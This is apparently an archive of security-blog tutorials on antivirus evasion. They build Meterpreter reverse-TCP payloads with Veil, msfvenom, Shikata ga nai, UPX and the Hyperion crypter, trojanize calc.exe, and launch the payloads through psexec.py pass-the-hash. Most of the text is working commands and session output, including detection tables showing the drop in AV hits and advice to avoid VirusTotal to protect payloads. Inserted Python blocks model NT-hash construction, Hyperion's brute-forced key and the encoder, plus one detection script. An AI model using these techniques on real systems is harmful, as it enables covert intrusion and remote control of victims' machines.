Archive for category AV Bypass

Veil + psexec.py = pwnage

Before I begin, please do not upload any payloads referenced in this tutorial to sites like VirusTotal. Antivirus companies use these samples to create new signatures for their products. OK, on to it.

First of all, Veil is a nice little payload generator that builds your Windows payload entirely within Kali. It was created by Chris Truncer using some of the antivirus bypass techniques shared by Dave Kennedy and Debasish Mandal. Chris already has a nice tutorial on how to get set up and running. I’ve been using Option 7 to generate payloads, which seems to bypass Microsoft Security Essentials just fine.

Second, Impacket (from Core Security) includes a Python implementation of psexec, psexec.py, which you can use to upload and execute your payload on a remote machine over SMB. To install, simply download the latest Impacket release and run setup.py.

root@kali:~# wget http://impacket.googlecode.com/files/impacket-0.9.10.tar.gz
root@kali:~# tar -xzvf impacket-0.9.10.tar.gz
root@kali:~# cd impacket-0.9.10/
root@kali:~/impacket-0.9.10# python setup.py install

Let’s walk through a quick example of using both of these tools.

First, we generate a payload:

root@kali:/opt/Veil# python Veil.py 

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] What payload type would you like to use?

 1 - Meterpreter - Python - void pointer
 2 - Meterpreter - Python - VirtualAlloc()
 3 - Meterpreter - Python - base64 Encoded
 4 - Meterpreter - Python - Letter Substitution
 5 - Meterpreter - Python - ARC4 Stream Cipher
 6 - Meterpreter - Python - DES Encrypted
 7 - Meterpreter - Python - AES Encrypted
 8 - Meterpreter - C - void pointer
 9 - Meterpreter - C - VirtualAlloc()
 0 - Exit Veil

[>] Please enter the number of your choice: 7

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] Use msfvenom or supply custom shellcode?

 1 - msfvenom (default)
 2 - Custom

[>] Please enter the number of your choice: 1

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] What type of payload would you like?

 1 - Reverse TCP
 2 - Reverse HTTP
 3 - Reverse HTTPS
 0 - Main Menu

[>] Please enter the number of your choice: 1
[?] What's the Local Host IP Address: 192.168.81.201
[?] What's the Local Port Number: 443
[*] Generating shellcode...

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] How would you like to create your payload executable?

 1 - Pyinstaller (default)
 2 - Py2Exe

[>] Please enter the number of your choice: 1

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[!] Be sure to set up a Reverse TCP handler with the following settings:

 PAYLOAD = windows/meterpreter/reverse_tcp
 LHOST   = 192.168.81.201
 LPORT   = 443

[!] Your payload files have been generated, don't get caught!

root@kali:/opt/Veil# mv payload.exe TrustedSec.exe

Next, we start a multi/handler with “smart_migrate” enabled:

msf exploit(handler) > resource /root/scripts/msf/multi_handler/reverse_tcp.rc 
[*] Processing /root/scripts/msf/multi_handler/reverse_tcp.rc for ERB directives.
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> use multi/handler
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set LPORT 443
LPORT => 443
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set ExitOnSession false
ExitOnSession => false
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set AutoRunScript post/windows/manage/smart_migrate
AutoRunScript => post/windows/manage/smart_migrate
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:443 
[*] Starting the payload handler...

Now we can use psexec.py to upload and execute our payload, authenticating with either a username and password or a username and NTLM hash (pass-the-hash):

Username/password example:
psexec.py TrustedSec:'InformationSecurityMadeSimple!'@192.168.81.129 cmd.exe

Username/hash example:
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537 test@192.168.81.129 cmd.exe
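How the value passed to -hashes is put together, as an added example that is not part of this post or of Impacket: the argument is LMHASH:NTHASH. The NT hash is MD4 over the UTF-16LE encoding of the password, unsalted, which is why it can be replayed as-is; and aad3b435b51404eeaad3b435b51404ee (the LM half used in the example above) is the well-known LM hash of an empty password, which is what a dump shows when LM hashing is disabled. The MD4 below is a pure-Python transcription of RFC 1320 so the script needs nothing beyond the standard library (hashlib often lacks md4 on OpenSSL 3 builds); the password at the bottom is a constructed value, not the credential from the post.

```python
import struct

MASK32 = 0xFFFFFFFF
# LM hash of an empty password: what you see when LM hashing is disabled.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320: pad, then three 16-step rounds per 64-byte block."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)      # bit length, little-endian

    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z

    # (function, message-word order, shift schedule, round constant)
    rounds = (
        (F, list(range(16)), (3, 7, 11, 19), 0x00000000),
        (G, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (H, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]

    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]                              # working copy of a, b, c, d
        for func, ks, ss, const in rounds:
            for i in range(16):
                p = (-i) % 4                      # register updated this step: a, d, c, b, ...
                x, y, z = v[(p + 1) % 4], v[(p + 2) % 4], v[(p + 3) % 4]
                v[p] = _rotl((v[p] + func(x, y, z) + X[ks[i]] + const) & MASK32, ss[i % 4])
        state = [(s + w) & MASK32 for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)). No salt, so the hash itself is the credential."""
    return md4(password.encode("utf-16-le")).hex()


def psexec_hashes_arg(password: str) -> str:
    """The LM:NT string psexec.py -hashes expects when only the password is known."""
    return f"{EMPTY_LM_HASH}:{nt_hash(password)}"


if __name__ == "__main__":
    # Constructed example password for illustration only.
    print(psexec_hashes_arg("password"))
```

In practice you get the NT hash from a dump rather than a password, and the LM half can be left as the empty-password constant; psexec.py only needs the NT half for NTLM authentication.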

Psexec session:

Impacket v0.9.10 - Copyright 2002-2013 Core Security Technologies
Trying protocol 445/SMB...
[*] Requesting shares on 192.168.81.139.....
[*] Found writable share ADMIN$
[*] Uploading file KDgwQrZj.exe
[*] Opening SVCManager on 192.168.81.139.....
[*] Creating service rWGK on 192.168.81.139.....
[*] Starting service rWGK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>put TrustedSec.exe
[*] Uploading TrustedSec.exe to ADMIN$\/
C:\Windows\system32>start TrustedSec.exe
C:\Windows\system32>del ..\\TrustedSec.exe
C:\Windows\system32>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on 192.168.81.139.....
[*] Stoping service rWGK.....
[*] Removing service rWGK.....
[*] Removing file KDgwQrZj.exe.....
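What that session leaves behind on the target, and one way to hunt for it, as an added example that is not part of this post or of Impacket. When the Service Control Manager installs a service it writes Event ID 7045 ("A service was installed in the system") to the System log with the ServiceName and ImagePath. psexec.py created a service with a random four-letter name (rWGK above) whose binary is a random eight-letter .exe it uploaded through ADMIN$, i.e. straight into the Windows directory (KDgwQrZj.exe above), and then removed both on exit, so the event record is the durable evidence. The records below are constructed to mirror that run; the field names are those of 7045, but the name-length heuristic is an assumption about this Impacket version rather than a general rule, and legitimate installers can collide with it.

```python
import re

# Constructed System-log records shaped like Event ID 7045; the first one mirrors the
# names in the psexec.py session above, the others are benign lookalikes.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "rWGK",
     "ImagePath": r"%SystemRoot%\KDgwQrZj.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"%SystemRoot%\System32\spoolsv.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "VMTools",
     "ImagePath": r"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe", "AccountName": "LocalSystem"},
    {"EventID": 7036, "ServiceName": "rWGK", "ImagePath": "", "AccountName": ""},
]

# Heuristics tuned to this Impacket version (assumption): a four-letter service name and
# an eight-letter .exe sitting directly in the Windows directory, where ADMIN$ maps.
RANDOM_SERVICE_NAME = re.compile(r"^[A-Za-z]{4}$")
RANDOM_EXE_IN_WINDIR = re.compile(
    r"^(?:%SystemRoot%|C:\\Windows)\\[A-Za-z]{8}\.exe$", re.IGNORECASE)


def looks_like_impacket_psexec(event: dict) -> bool:
    """True for a 7045 whose service name and binary both look machine-generated."""
    if event.get("EventID") != 7045:
        return False
    return bool(RANDOM_SERVICE_NAME.match(event.get("ServiceName", ""))
                and RANDOM_EXE_IN_WINDIR.match(event.get("ImagePath", "")))


def find_psexec_installs(events):
    """Filter a list of parsed event records down to the suspicious service installs."""
    return [e for e in events if looks_like_impacket_psexec(e)]


if __name__ == "__main__":
    for hit in find_psexec_installs(SAMPLE_EVENTS):
        print(f"psexec-style service install: {hit['ServiceName']} -> {hit['ImagePath']}")
```

From the red-team side the same heuristic tells you what to change: the service name and binary name are the parts of the run you control least, and the 7045 record survives the cleanup at the end of the session.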

Reap the shellz:

[*] Sending stage (751104 bytes) to 192.168.81.129
[*] Meterpreter session 1 opened (192.168.81.201:443 -> 192.168.81.129:1038) at 2013-06-09 19:57:17 -0400
[*] Session ID 1 (192.168.81.201:443 -> 192.168.81.129:1038) processing AutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: TrustedSec.exe (1436)
[+] Migrating to 632
[+] Successfully migrated to process

BooYah!!!


PE Crypters (Hyperion)

I recently watched a presentation that rel1k gave at BSides Cleveland 2012, in which he revealed some of his top secret antivirus bypass techniques. He quickly explained and demonstrated binary droppers, shellcodeexec, PowerShell injection, modifying Metasploit payload templates, and PE crypters. This last one caught my attention, as I hadn’t heard of it before. The PE crypter that he demonstrated is called Hyperion, by nullsecurity. It works somewhat like a PE packer, but instead of scrambling the payload and wrapping it with explicit instructions on how to unscramble it, the payload is AES-128 encrypted under a deliberately weak key (most of the key bytes are zero and the rest are drawn from a tiny range), and the stub simply brute-forces that key at execution time, so the key never has to be stored in the file. Let’s try it out. Only the source files are made available, so we’ll have to compile it ourselves. Luckily, BackTrack ships a MinGW toolchain that runs under Wine, so we can build the Windows binary without leaving the box.

root@bt:~# wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
root@bt:~# unzip Hyperion-1.0.zip 
root@bt:~# cd Hyperion-1.0
root@bt:~/Hyperion-1.0# wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe
root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe

Now that we have our Hyperion crypter executable, let’s create a Metasploit payload.

root@bt:~/Hyperion-1.0# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
-rw-r--r-- 1 root root  73802 2012-07-29 16:13 payload.exe

Before we encrypt our payload, let’s see if Microsoft Security Essentials (MSE) detects anything.

MSE detects our payload as “Trojan:Win32/Swrort.A”. That’s no good, but that’s exactly what Hyperion is supposed to help us get around. So, let’s try encrypting our payload.

root@bt:~/Hyperion-1.0# wine crypter.exe payload.exe encrypted_payload.exe

Opening payload.exe
Copied file to memory: 0x115818
Found valid MZ signature
Found pointer to PE Header: 0xe8
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0x400000

Found Section: .text
VSize: 0xa966, VAddress: 0x1000, RawSize: 0xb000, RawAddress: 0x1000

Found Section: .rdata
VSize: 0xfe6, VAddress: 0xc000, RawSize: 0x1000, RawAddress: 0xc000

Found Section: .data
VSize: 0x705c, VAddress: 0xd000, RawSize: 0x4000, RawAddress: 0xd000

Found Section: .rsrc
VSize: 0x7c8, VAddress: 0x15000, RawSize: 0x1000, RawAddress: 0x11000

Input file size + Checksum: 0x1204e
Rounded up to a multiple of key size: 0x12050
Generated Checksum: 0x5e921e
Generated Encryption Key: 0x2 0x3 0x0 0x3 0x0 0x3 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0

Written encrypted input file as fasm array to:
-> Src\FasmContainer32\infile.asm

Written input file's image base to:
-> Src\FasmContainer32\imagebase.asm

Written input file's image size to:
-> Src\FasmContainer32\sizeofimage.asm

Written keysize to:
-> Src\FasmContainer32\keysize.inc

Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm encrypted_payload.exe
FASM Working Directory: Z:\root\Hyperion-1.0

Executing fasm.exe

root@bt:~/Hyperion-1.0# flat assembler  version 1.69.31  (1310719 kilobytes memory)
5 passes, 0.5 seconds, 92672 bytes.

root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
-rwxr-xr-x 1 root root  92672 2012-08-02 16:53 encrypted_payload.exe
-rw-r--r-- 1 root root  73802 2012-07-29 16:13 payload.exe
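What the crypter is doing with that key, as an added example that is not Hyperion’s code: look at the generated key above. Only the first six bytes are non-zero and each of them is a value from 0 to 3, so there are just 4^6 = 4096 possible keys. The stub does not carry the key; it appends a checksum to the plaintext before encryption and, at run time, tries every candidate key until the checksum of the decrypted image matches. The block below models that scheme with the standard library only. It substitutes a SHA-256 counter-mode keystream for AES-128 (assumption: the cipher is irrelevant to the point, which is the size of the key space), uses CRC32 where Hyperion has its own checksum, passes the payload length separately the way Hyperion writes it into sizeofimage.asm, and the payload bytes are constructed.

```python
import hashlib
import itertools
import os
import zlib

KEY_SIZE = 16        # 128-bit key, as in the crypter output above
KEY_BYTES = 6        # leading key bytes that are random; the rest stay zero
KEY_RANGE = 4        # each random byte is in 0..KEY_RANGE-1


def key_space_size() -> int:
    """Number of keys the stub has to try in the worst case."""
    return KEY_RANGE ** KEY_BYTES


def keystream(key: bytes, length: int) -> bytes:
    """Stand-in for AES-128: SHA-256 in counter mode (example only, not what Hyperion uses)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "little")).digest()
        counter += 1
    return bytes(out[:length])


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def generate_weak_key(rng=os.urandom) -> bytes:
    """Random head of KEY_BYTES small values, zero-padded to the full key size."""
    head = bytes(b % KEY_RANGE for b in rng(KEY_BYTES))   # 256 % 4 == 0, so no bias
    return head + bytes(KEY_SIZE - KEY_BYTES)


def encrypt_container(payload: bytes, key: bytes) -> bytes:
    """Crypter side: append a checksum of the plaintext, pad to the key size, encrypt."""
    body = payload + zlib.crc32(payload).to_bytes(4, "little")
    body += b"\x00" * (-len(body) % KEY_SIZE)
    return xor(body, keystream(key, len(body)))


def candidate_keys():
    """Every key the generator could have produced, in a fixed order."""
    for head in itertools.product(range(KEY_RANGE), repeat=KEY_BYTES):
        yield bytes(head) + bytes(KEY_SIZE - KEY_BYTES)


def brute_force_decrypt(container: bytes, payload_len: int):
    """Stub side: try each key; the checksum tells it when it has the right one."""
    for attempts, key in enumerate(candidate_keys(), start=1):
        plain = xor(container, keystream(key, len(container)))
        payload = plain[:payload_len]
        stored_crc = plain[payload_len:payload_len + 4]
        if zlib.crc32(payload).to_bytes(4, "little") == stored_crc:
            return key, payload, attempts
    return None, None, key_space_size()


# The key printed by the crypter above, plus a constructed stand-in for payload.exe.
PAGE_KEY = bytes([0x2, 0x3, 0x0, 0x3, 0x0, 0x3]) + bytes(KEY_SIZE - 6)
SAMPLE_PAYLOAD = b"\x90" * 40 + b"constructed stand-in for payload.exe"


def demo():
    """Encrypt with the page's key and recover it by brute force; returns (ok, attempts)."""
    container = encrypt_container(SAMPLE_PAYLOAD, PAGE_KEY)
    key, payload, attempts = brute_force_decrypt(container, len(SAMPLE_PAYLOAD))
    return key == PAGE_KEY and payload == SAMPLE_PAYLOAD, attempts


if __name__ == "__main__":
    print(demo(), "of", key_space_size(), "candidate keys")
```

The numbers are the point: a few thousand trial decryptions cost the stub milliseconds, and the only knob the scheme has is KEY_BYTES and KEY_RANGE, which trades a slower start-up on the victim for a longer run inside a sandbox or emulator. Whatever you do to the key, the decryption loop itself is the same in every output file, which is the static-stub problem discussed at the end of this post.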

And if we copy our encrypted payload to our Windows host…

Ah, nothing to see here :-) MSE stays quiet. Let’s see if it works.

msf  exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.10.129
[*] Meterpreter session 1 opened (192.168.10.128:443 -> 192.168.10.129:1047) at 2012-08-02 17:17:53 -0400

msf  exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  1   meterpreter x86/win32  VULNXP\Administrator @ VULNXP  192.168.10.128:443 -> 192.168.10.129:1047 (192.168.10.129)

Oh, you know that’s right!

You’ll notice that I didn’t upload this to VirusTotal to see how many anti-virus vendors detect our payload as malicious. It’s pretty well known now that this is one place anti-virus vendors go to find new payloads that they need to create signatures for detection. So, your best option for testing custom payloads is to simply install the version of anti-virus that you are trying to bypass.

Also, as rel1k stated in his presentation, the stub used to encapsulate the payload is static, so anti-virus vendors can easily create a signature for it, and every payload wrapped with an unmodified Hyperion will carry the same stub. He suggests modifying the source so that it is polymorphic. Alas, I have no idea how to do that right now, so maybe we will cover that in a later post. Happy Crypting!


Payload Creation

I’m going to jump ahead a bit this month. I’ve been attending the Offensive-Security Ohio Chapter meetings, hosted by Offensive-Security and Diebold, Incorporated, and led by ReL1K. If you have the means and you’re just getting into the business of ethical hacking, I highly recommend attending. If you’re not in the area, the last meeting was streamed via USTREAM, so check the Offensive-Security site for details.

At the first two meetings, we learned the basics of Metasploit, Fast-Track, and SET.  I’m just going to cover the topic of creating a payload and encoding it to avoid detection from anti-virus.

First, we use “msfpayload” to dump the raw shellcode for a reverse-connect (reverse_tcp) Meterpreter session. Meterpreter is the holy grail of Metasploit. It allows us to easily upload/download files and run commands, steal access tokens, disable AV, enable RDP and much, much more. Because the victim connects back to us rather than listening for us, the session works from behind NAT; we just need to pick a port that we know will pass any egress filter, such as 80 or 443. Here is the command that we use to create the raw data:

cd /pentest/exploits/framework3
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.0.147 lport=443 R > moo.raw

Next, we create an executable from the raw dump and encode it with five iterations of “Shikata ga nai” (Japanese for “it can’t be helped” or “nothing can be done about it”). It is Metasploit’s polymorphic XOR additive-feedback encoder: every run picks a fresh key, so the encoded bytes differ each time, which is what we rely on to dodge static AV signatures. The short decoder stub in front of them is shuffled as well, but its overall structure is well known to AV engines, which is why the results below are mixed.

msfencode -i moo.raw -o moo.exe -e x86/shikata_ga_nai -c 5 -t exe
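A model of the byte transformation Shikata ga nai performs, as an added example that is not Metasploit’s encoder or its x86 decoder stub: each 32-bit word is XORed with the current key, and the plaintext word is then added to the key, so one four-byte seed yields a position-dependent keystream and the decoder loop only needs xor-then-add. Passing -c 5 re-encodes the previous output four more times with a fresh key each pass. This models the data transform only (assumption: the real encoder also emits a decoder stub and handles padding its own way); the sample bytes are constructed.

```python
import os
import struct

MASK32 = 0xFFFFFFFF


def _pad(data: bytes) -> bytes:
    """The encoder works on whole dwords; zero-pad to a multiple of four."""
    return data + b"\x00" * (-len(data) % 4)


def xor_additive_feedback_encode(data: bytes, key: int) -> bytes:
    """XOR each dword with the running key, then add the *plaintext* dword to the key."""
    out = bytearray()
    for (word,) in struct.iter_unpack("<I", _pad(data)):
        out += struct.pack("<I", word ^ key)
        key = (key + word) & MASK32
    return bytes(out)


def xor_additive_feedback_decode(data: bytes, key: int) -> bytes:
    """Mirror of the decoder loop: xor [ptr], key ; add key, [ptr] (the now-decoded dword)."""
    out = bytearray()
    for (word,) in struct.iter_unpack("<I", data):
        plain = word ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & MASK32
    return bytes(out)


def encode_iterations(data: bytes, count: int, rng=os.urandom):
    """msfencode -c N: feed the previous output back in with a fresh random key each pass."""
    keys = []
    for _ in range(count):
        key = struct.unpack("<I", rng(4))[0]
        data = xor_additive_feedback_encode(data, key)
        keys.append(key)
    return data, keys


def decode_iterations(data: bytes, keys) -> bytes:
    """Undo the passes in reverse order, which is what N nested decoder stubs do."""
    for key in reversed(keys):
        data = xor_additive_feedback_decode(data, key)
    return data


if __name__ == "__main__":
    sample = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"  # constructed
    first, keys = encode_iterations(sample, 5)
    second, _ = encode_iterations(sample, 5)
    print("five passes differ between runs:", first != second)
    print("round trip ok:", decode_iterations(first, keys) == _pad(sample))
```

Two runs over the same input produce different bytes, so a signature on the encoded body is useless; what does not change is that a decoder has to precede the body, and that is where detection happens.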

Let’s put this executable to the test. VirusTotal is an excellent site that allows you to upload a file and scan it with numerous anti-virus engines. (Bear in mind that samples uploaded there are shared with the vendors, so it is a poor place to test a payload you intend to reuse; see the note at the top of this archive.)

Antivirus Version Last update Result
AhnLab-V3 2011.03.20.00 2011.03.19 Trojan/Win32.Shell
AntiVir 7.11.5.1 2011.03.18 TR/Crypt.EPACK.Gen2
Antiy-AVL 2.0.3.7 2011.03.19
Avast 4.8.1351.0 2011.03.19 Win32:SwPatch
Avast5 5.0.677.0 2011.03.19 Win32:SwPatch
AVG 10.0.0.1190 2011.03.19 Win32/Heur
BitDefender 7.2 2011.03.19 Backdoor.Shell.AC
CAT-QuickHeal 11.00 2011.03.19 Win32.Trojan.Swrort.A.4
ClamAV 0.96.4.0 2011.03.19
Commtouch 5.2.11.5 2011.03.19 W32/Swrort.A.gen!Eldorado
Comodo 8042 2011.03.19
DrWeb 5.0.2.03300 2011.03.19
Emsisoft 5.1.0.2 2011.03.19
eSafe 7.0.17.0 2011.03.17
eTrust-Vet 36.1.8223 2011.03.18 Win32/Swrort.A!generic
F-Prot 4.6.2.117 2011.03.19 W32/Swrort.A.gen!Eldorado
F-Secure 9.0.16440.0 2011.03.19 Backdoor.Shell.AC
Fortinet 4.2.254.0 2011.03.19
GData 21 2011.03.19 Backdoor.Shell.AC
Ikarus T3.1.1.97.0 2011.03.19
Jiangmin 13.0.900 2011.03.18
K7AntiVirus 9.94.4155 2011.03.19 Riskware
Kaspersky 7.0.0.125 2011.03.19
McAfee 5.400.0.1158 2011.03.19
McAfee-GW-Edition 2010.1C 2011.03.19
Microsoft 1.6603 2011.03.19 Trojan:Win32/Swrort.A
NOD32 5968 2011.03.19 a variant of Win32/Rozena.AH
Norman 6.07.03 2011.03.19
nProtect 2011-02-10.01 2011.02.15 Backdoor.Shell.AC
Panda 10.0.3.5 2011.03.19 Suspicious file
PCTools 7.0.3.5 2011.03.19
Prevx 3.0 2011.03.20
Rising 23.49.04.05 2011.03.18
Sophos 4.63.0 2011.03.20 Mal/Swrort-C
SUPERAntiSpyware 4.40.0.1006 2011.03.19 Trojan.Backdoor-PoisonIvy
Symantec 20101.3.0.103 2011.03.19
TheHacker 6.7.0.1.152 2011.03.19
TrendMicro 9.200.0.1012 2011.03.19
TrendMicro-HouseCall 9.200.0.1012 2011.03.19
VBA32 3.12.14.3 2011.03.18
VIPRE 8758 2011.03.20 Trojan.Win32.Swrort.B (v)
ViRobot 2011.3.19.4366 2011.03.19
VirusBuster 13.6.258.0 2011.03.19 Trojan.Rosena.Gen.1

21 of the 43 engines flagged it. Not bad, but hopefully we can do better. Another trick ReL1k taught us was to pack the executable with UPX, which further helps us avoid detection. Here is the command to create a “packed” executable, using the UPX binary that ships with sqlmap:

/pentest/database/sqlmap/lib/contrib/upx/linux/upx -9 -o moo_packed.exe moo.exe

Antivirus Version Last update Result
AhnLab-V3 2011.03.20.00 2011.03.19
AntiVir 7.11.5.1 2011.03.18 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2011.03.19
Avast 4.8.1351.0 2011.03.19
Avast5 5.0.677.0 2011.03.19
AVG 10.0.0.1190 2011.03.20 Win32/Heur
BitDefender 7.2 2011.03.19 Gen:Variant.Kazy.7277
CAT-QuickHeal 11.00 2011.03.19
ClamAV 0.96.4.0 2011.03.19
Commtouch 5.2.11.5 2011.03.19
Comodo 8042 2011.03.19
DrWeb 5.0.2.03300 2011.03.19
Emsisoft 5.1.0.2 2011.03.20
eSafe 7.0.17.0 2011.03.17
eTrust-Vet 36.1.8223 2011.03.18
F-Prot 4.6.2.117 2011.03.19
F-Secure 9.0.16440.0 2011.03.19 Gen:Variant.Kazy.7277
Fortinet 4.2.254.0 2011.03.19
GData 21 2011.03.19 Gen:Variant.Kazy.7277
Ikarus T3.1.1.97.0 2011.03.19
Jiangmin 13.0.900 2011.03.18
K7AntiVirus 9.94.4155 2011.03.19
Kaspersky 7.0.0.125 2011.03.19
McAfee 5.400.0.1158 2011.03.19
McAfee-GW-Edition 2010.1C 2011.03.19
Microsoft 1.6603 2011.03.19
NOD32 5968 2011.03.19
Norman 6.07.03 2011.03.19
nProtect 2011-02-10.01 2011.02.15 Gen:Variant.Kazy.7277
Panda 10.0.3.5 2011.03.19 Suspicious file
PCTools 7.0.3.5 2011.03.19
Prevx 3.0 2011.03.20
Rising 23.49.04.05 2011.03.18
Sophos 4.63.0 2011.03.20
SUPERAntiSpyware 4.40.0.1006 2011.03.19
Symantec 20101.3.0.103 2011.03.20 Suspicious.MH690.A
TheHacker 6.7.0.1.152 2011.03.19
TrendMicro 9.200.0.1012 2011.03.19 PAK_Generic.001
TrendMicro-HouseCall 9.200.0.1012 2011.03.20 PAK_Generic.001
VBA32 3.12.14.3 2011.03.18
VIPRE 8758 2011.03.20
ViRobot 2011.3.19.4366 2011.03.19
VirusBuster 13.6.258.0 2011.03.19

Down to 10 of 43. It’s not perfect, but definitely better. There’s always going to be a cat-and-mouse game between the hackers and the anti-virus vendors.

One more trick.  What if we want to attach the Meterpreter payload to a known good executable, such as “calc.exe”?  Here’s a quick one-liner.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.147 LPORT=443 R | msfencode -x ./calc.exe -k -e x86/shikata_ga_nai -c 5 -t exe -o payload_calc.exe

Then we just need to setup a listener using Metasploit’s “multi/handler”, copy “payload_calc.exe” to the victim machine and execute it.

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.147
LHOST => 192.168.0.147
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.147:443
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (749056 bytes) to 192.168.0.123
[*] Meterpreter session 1 opened (192.168.0.147:443 -> 192.168.0.123:1089) at Mon Mar 21 17:17:07 -0400 2011

msf exploit(handler) > sessions -i

Active sessions
===============

 Id  Type                   Information               Connection
 --  ----                   -----------               ----------
 1   meterpreter x86/win32  BUDLITE\spohnl @ BUDLITE  192.168.0.147:443 -> 192.168.0.123:1089

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Booya! We have a Meterpreter session and the victim is none the wiser. As a final step, we’ll want to migrate the Meterpreter session off the calc executable (here into the user’s explorer.exe, PID 1436) so we keep our session after calc is closed. Oh, and don’t forget to upgrade your access to SYSTEM!

meterpreter > ps

Process list
============

 PID   Name                 Arch  Session  User                 Path
 ---   ----                 ----  -------  ----                 ----
 0     [System Process]
 4     System               x86   0
 540   smss.exe             x86   0        NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
 612   csrss.exe            x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\csrss.exe
 636   winlogon.exe         x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\winlogon.exe
 680   services.exe         x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\services.exe
 692   lsass.exe            x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\lsass.exe
 848   vmacthlp.exe         x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 864   svchost.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\svchost.exe
 940   svchost.exe          x86   0                             C:\WINDOWS\system32\svchost.exe
 1044  svchost.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
 1120  svchost.exe          x86   0                             C:\WINDOWS\system32\svchost.exe
 1288  svchost.exe          x86   0                             C:\WINDOWS\system32\svchost.exe
 1436  explorer.exe         x86   0        BUDLITE\spohnl       C:\WINDOWS\Explorer.EXE
 1532  spoolsv.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\spoolsv.exe
 1720  VMwareTray.exe       x86   0        BUDLITE\spohnl       C:\Program Files\VMware\VMware Tools\VMwareTray.exe
